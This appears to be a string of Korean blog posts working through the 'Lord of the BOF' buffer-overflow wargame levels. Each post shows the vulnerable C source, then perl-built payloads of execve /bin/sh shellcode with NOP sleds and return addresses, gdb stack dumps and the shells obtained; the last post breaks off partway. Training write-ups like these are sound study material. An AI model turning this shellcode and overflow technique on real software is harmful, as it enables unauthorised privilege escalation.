반응형

[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// here is changed!

if(strlen(argv[0]) != 77){ //argv[0], 즉 (프로그램명)입력값이 77보다 작으면 에러가 납니다.

                printf("argv[0] error\n");

                exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'//우선은 프로그램명 길이를 77로 맟추고 공격시도

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //제대로 된 리턴어드레스를 넣고 공격.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0]=절대경로

./는 //가 몇개있어도 상관없다

.이랑 orgi=5

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데


반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

troll->vampire  (0) 2013.12.22
orge->troll  (0) 2013.12.21
wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
반응형

[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf 

        - egghunter + buffer hunter + check length of argv[1]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);

}

[wolfman@localhost wolfman]$ vi darkelv.c  /*우선 복사본을 만들어놓습니다*/

[wolfman@localhost wolfman]$ gcc darkelv.c -o darkelv

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x13, "\xbf"'`

j

 X?Rh//shh/bin??S?訴€????????????????????????

Segmentation fault (core dumped)

[wolfman@localhost wolfman]$ gdb -q darkelv core

Core was generated by `./darkelv j

                                  X?Rh//shh/bin??S?訴€?????????????????????????.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp /*뜯어서 쉘코드가 어디들어가는지 봤습니다.*/

0xbffffae0: 0x00000000 0xbffffb24    0xbffffb30    0x40013868

0xbffffaf0: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffb00: 0x08048500 0x00000002 0xbffffb24    0x08048390

0xbffffb10: 0x0804864c 0x4000ae60 0xbffffb1c    0x40013e90

0xbffffb20: 0x00000002 0xbffffc1e    0xbffffc28    0x00000000

0xbffffb30: 0xbffffc59    0xbffffc6b    0xbffffc82    0xbffffca1

0xbffffb40: 0xbffffcc3    0xbffffcd0    0xbffffe93    0xbffffeb2

0xbffffb50: 0xbffffecf     0xbffffee4    0xbfffff03     0xbfffff0e

0xbffffb60: 0xbfffff26            0xbfffff36     0xbfffff3e     0xbfffff48

0xbffffb70: 0xbfffff58     0xbfffff66     0xbfffff74     0xbfffff85

0xbffffb80: 0xbfffff90     0xbfffffa3     0xbfffffe6     0x00000000

0xbffffb90: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffba0: 0x00000005 0x00000006

(gdb) 

0xbffffba8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffbb8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbc8: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffbd8: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffbe8: 0x00000010 0x0febfbff     0x0000000f  0xbffffc19

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc18: 0x38366900 0x2f2e0036      0x6b726164 0x00766c65

0xbffffc28:0x99580b6a 0x2f2f6852       0x2f686873 0x896e6962 //NOP미끄럼틀과 함께..

0xbffffc38:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0xbf909090

0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc68: 0x00000000 0x00000000

(gdb) 

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd30: 0x00000000 0x00000000

(gdb) quit

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'` /*저 주소값을 넣고 다시 공격합니다*/

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 505

love eyuna

bash$ quit

sh: quit: command not found

bash$ exit

exit

[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 506

//쉘이 따였습니다.

후후 하나를푸니 포풍돌파네여

근데.. 푸는방법쓰기 귀찮아서 (다시볼겸 풀이추가했습니다).. 그냥 쉘코드 주소찾고 넣은거에요ㅋㅋ

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

orge->troll  (0) 2013.12.21
darkelf->orge  (0) 2013.11.22
orc->wolfman  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
반응형

/*1. Bash2 실행*/

[orc@localhost orc]$ bash2

/*2. 소스를 봅시다*/

[orc@localhost orc]$ cat wolfman.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);    //버퍼가 40바이트인데 40바이트를 모두 40으로 채워버립니다

}

/*여기서, 버퍼는 사용할 수 없다는 것을 알게됩니다. 그래서 대충 페이로드를 짜서 넣어봅니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` 

???????????????????????????????????????????????퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€

Segmentation fault (core dumped) //코더덤프☆를 주니까 까봅시다.

/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'*/

[orc@localhost orc]$ gdb -q wolvman core

Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j

                    X?R'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x99580b6a 0x2f2f6852   0x2f686873 0x896e6962

0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14    0x08048390

0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c    0x40013e90

0xbffffb10: 0x00000002 0xbffffc13     0xbffffc1d    0x00000000

0xbffffb20: 0xbffffc75    0xbffffc83         0xbffffc9a    0xbffffcb9

0xbffffb30: 0xbffffcdb    0xbffffce4     0xbffffea7    0xbffffec6

0xbffffb40: 0xbffffedf     0xbffffef4     0xbfffff0f      0xbfffff1a

0xbffffb50: 0xbfffff32     0xbfffff3e     0xbfffff46     0xbfffff50

0xbffffb60: 0xbfffff60     0xbfffff6e     0xbfffff7c         0xbfffff8d

0xbffffb70: 0xbfffff98     0xbfffffa7     0xbfffffe6     0x00000000

0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb90: 0x00000005 0x00000006

(gdb) 

0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8

0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8

0xbffffbd8: 0x00000010 0x0febfbff    0x0000000f 0xbffffc0e

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f

0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x580b6a90

(gdb) quit

/*제가 이 문제를 풀었을때는 쉘코드가 0xbffffc37지점에 있었는데 말이죠..;;....... 

암튼 공격해봤습니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????


bash$ exit     //잘되네여

exit

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????

bash$ my-pass

euid = 505    //땋

이번엔.. 쉽게풀었네요ㅋㅋ

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkelf->orge  (0) 2013.11.22
wolfman->darkelf  (0) 2013.11.21
goblin->orc  (0) 2013.11.20
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30
반응형

/* 1. 소스코드를 확인합니다. */

/* 소스코드를 복사해 복사본을 만들어주시기 바랍니다. 여기서는 orx가 그 경우입니다.*/

[goblin@localhost goblin]$ cat orc.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orc

        - egghunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}


/* 2. \xff가 인식되도록 bash2를 사용합니다. */

[goblin@localhost goblin]$ bash2


/* 3. 그냥 찾다가 얻은 리턴어드레스로 해봅니다.*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'` `perl -e 'print "\x90"x9, "\xac\xfa\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€??????????? //안되네여.


/* 4. gdb로 까서 주소를 얻어보았습니다. call strcpy에 브포를 걸고 `perl -e 'print"\x90"x47, "\xbf"'`이런식으로 48번째 바이트에 \xbf를 넣고 구경하다보니 나왔습니다(기억안남ㅋ;;;) */

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x48\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????H?

Illegal instruction (core dumped)


[goblin@localhost goblin]$ gdb -q orx 

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push   %ebp

0x8048501 <main+1>: mov    %esp,%ebp

0x8048503 <main+3>: sub    $0x2c,%esp

0x8048506 <main+6>: cmpl   $0x1,0x8(%ebp)

0x804850a <main+10>: jg     0x8048523 <main+35>

0x804850c <main+12>: push   $0x8048640

0x8048511 <main+17>: call   0x8048410 <printf>

0x8048516 <main+22>: add    $0x4,%esp

0x8048519 <main+25>: push   $0x0

0x804851b <main+27>: call   0x8048420 <exit>

0x8048520 <main+32>: add    $0x4,%esp

0x8048523 <main+35>: nop    

0x8048524 <main+36>: movl   $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop    

0x804852c <main+44>: lea    0x0(%esi,1),%esi

0x8048530 <main+48>: mov    0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea    0x0(,%eax,4),%edx

0x804853a <main+58>: mov    0x8049764,%eax

0x804853f <main+63>:         cmpl   $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne    0x8048547 <main+71>

0x8048545 <main+69>: jmp    0x8048587 <main+135>

0x8048547 <main+71>: mov    0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea    0x0(,%eax,4),%edx

0x8048551 <main+81>: mov    0x8049764,%eax

0x8048556 <main+86>: mov    (%eax,%edx,1),%edx

0x8048559 <main+89>: push   %edx

0x804855a <main+90>: call   0x80483f0 <strlen>

0x804855f <main+95>:  add    $0x4,%esp

0x8048562 <main+98>: mov    %eax,%eax

0x8048564 <main+100>: push   %eax

0x8048565 <main+101>: push   $0x0

0x8048567 <main+103>: mov    0xffffffd4(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x804856a <main+106>: lea    0x0(,%eax,4),%edx

0x8048571 <main+113>: mov    0x8049764,%eax

0x8048576 <main+118>: mov    (%eax,%edx,1),%edx

0x8048579 <main+121>: push   %edx

0x804857a <main+122>: call   0x8048430 <memset>

0x804857f <main+127>: add    $0xc,%esp

0x8048582 <main+130>: incl   0xffffffd4(%ebp)

0x8048585 <main+133>: jmp    0x8048530 <main+48>

0x8048587 <main+135>: mov    0xc(%ebp),%eax

0x804858a <main+138>: add    $0x4,%eax

0x804858d <main+141>: mov    (%eax),%edx

0x804858f <main+143>: add    $0x2f,%edx

0x8048592 <main+146>: cmpb   $0xbf,(%edx)

0x8048595 <main+149>: je     0x80485b0 <main+176>

0x8048597 <main+151>: push   $0x804864c

0x804859c <main+156>: call   0x8048410 <printf>

0x80485a1 <main+161>: add    $0x4,%esp

0x80485a4 <main+164>: push   $0x0

0x80485a6 <main+166>: call   0x8048420 <exit>

0x80485ab <main+171>: add    $0x4,%esp

0x80485ae <main+174>: mov    %esi,%esi

0x80485b0 <main+176>: mov    0xc(%ebp),%eax

0x80485b3 <main+179>: add    $0x4,%eax

0x80485b6 <main+182>: mov    (%eax),%edx

0x80485b8 <main+184>: push   %edx

0x80485b9 <main+185>: lea    0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push   %eax

0x80485bd <main+189>: call   0x8048440 <strcpy>

0x80485c2 <main+194>: add    $0x8,%esp

0x80485c5 <main+197>: lea    0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push   %eax

0x80485c9 <main+201>: push   $0x8048669

0x80485ce <main+206>: call   0x8048410 <printf>

---Type <return> to continue, or q <return> to quit---

0x80485d3 <main+211>: add    $0x8,%esp

0x80485d6 <main+214>: lea    0xffffffd8(%ebp),%eax

0x80485d9 <main+217>: push   %eax

0x80485da <main+218>: push   $0x804866d

0x80485df <main+223>: call   0x8048410 <printf>

0x80485e4 <main+228>: add    $0x8,%esp

0x80485e7 <main+231>: leave  

0x80485e8 <main+232>: ret    

0x80485e9 <main+233>: nop    

0x80485ea <main+234>: nop    

0x80485eb <main+235>: nop    

0x80485ec <main+236>: nop    

0x80485ed <main+237>: nop    

0x80485ee <main+238>: nop    

0x80485ef <main+239>: nop    

End of assembler dump.


/* 5. strcpy 브포. */

(gdb) b *main+189

Breakpoint 1 at 0x80485bd

(gdb) r `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`

Starting program: /home/goblin/orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`


Breakpoint 1, 0x80485bd in main ()

(gdb) x/50wx $esp

0xbffffb6c: 0xbffffdbd    0xbffffddb    0xbffffdf3     0xbffffdfe

0xbffffb7c: 0xbffffe0f     0xbffffe20    0xbffffe28     0x00000000

0xbffffb8c: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb9c: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffbac: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffbbc: 0x00000009 0x08048450 0x0000000b 0x000001f7

0xbffffbcc: 0x0000000c 0x000001f7 0x0000000d 0x000001f7

0xbffffbdc: 0x0000000e 0x000001f7 0x00000010 0x0febfbff

0xbffffbec: 0x0000000f 0xbffffc1e     0x00000000 0x00000000

0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x36690000 0x2f003638 0x656d6f68 0x626f672f

0xbffffc2c: 0x2f6e696c 0x0078726f

(gdb) 

0xbffffc34: 0x99580b6a    0x2f2f6852     0x2f686873  0x896e6962 //쉘코드가요기잉네

0xbffffc44: 0x895352e3   0x9080cde1 0x90909090 0x90909090  //0xbffffc34?35?

0xbffffc54: 0x90909090 0x90909090 0x90909090 0xbf90fc65

0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf4: 0x00000000 0x00000000

(gdb) quit

The program is running.  Exit anyway? (y or n) y


/* 6. 복사본에 시도해봅니다.*/

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

bash$         //오옹 되넹

bash$ exit

exit


/* 7. 원본에 시도해봅니다. */

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

Segmentation fault            //안되네여 하핳ㅎ하핳하하핳

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x34\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????4?

Illegal instruction


/*이 시점에선 그냥 34~40까지 해보자 하고 끝값을 마구마구 대입했습니다*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x33\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????3?

Segmentation fault

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x36\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????6?

Illegal instruction

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x37\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????7?

bash$ my-pass        //결국엔 됬어요.

euid = 504


아하하하하하하 굉장히 많은것을 배웠습니다

gdb에 대한 공포감도 줄이고, 알아낸게 많은 것 같습니다.

중간중간에 좀 안맞지만 (하도 오랫동안 삽질해서 날아간게 좀 많아요) 그래도 뼈대는 있네여. 고치면서 본건데 기억안나는것도 많고,,, 다음에 시간나면 다시 해봐야겠습니다.

이거 푸는동안 조언주신 많은 분들께 감사합니다!

기분좋네요ㅎㅎ


NOTES:


버퍼의 크기는 44

48번쨰 바이트는 \xbf여야 한다


코어는 해당 프로그램이 관리자 권한이 아닐 때 덤프가 떠지지 않는다

음 망했어


0xbffffc48

0xbffffc65

          28

          34

          35


48번째 바이트가 \xbf여야 하니까 3바이트 빼면 45바이트니까 환경변수 4바이트 nop 41바이트

gdb에서 \xff는 인식되지 않는다아앙ㅇ아ㅏㅇ


ㅋㅋ 정신나간 노트가 많습니다. 저 주소값들 어쩔꺼야;;

그래도 풀으니까 속시원하네여. 삽질한 성과가 있는것 같습니다ㅋㅋ

반응형

'STUDY > Lord of the BOF' 카테고리의 다른 글

wolfman->darkelf  (0) 2013.11.21
orc->wolfman  (0) 2013.11.21
cobolt->goblin  (0) 2013.11.01
gremlin->cobolt  (0) 2013.10.30
gate->gremlin  (0) 2013.10.27
반응형

/* 1. bash2를 사용해 \xff도 인식되도록 합니다*/

[cobolt@localhost cobolt]$ bash2


/*2. 환경변수를 생성합니다.*/

[cobolt@localhost cobolt]$ export COBOLT=$(perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"')

[cobolt@localhost cobolt]$ env //잘들어갔나 확인

PWD=/home/cobolt

REMOTEHOST=192.168.0.1

HOSTNAME=localhost.localdomain

LESSOPEN=|/usr/bin/lesspipe.sh %s

USER=cobolt

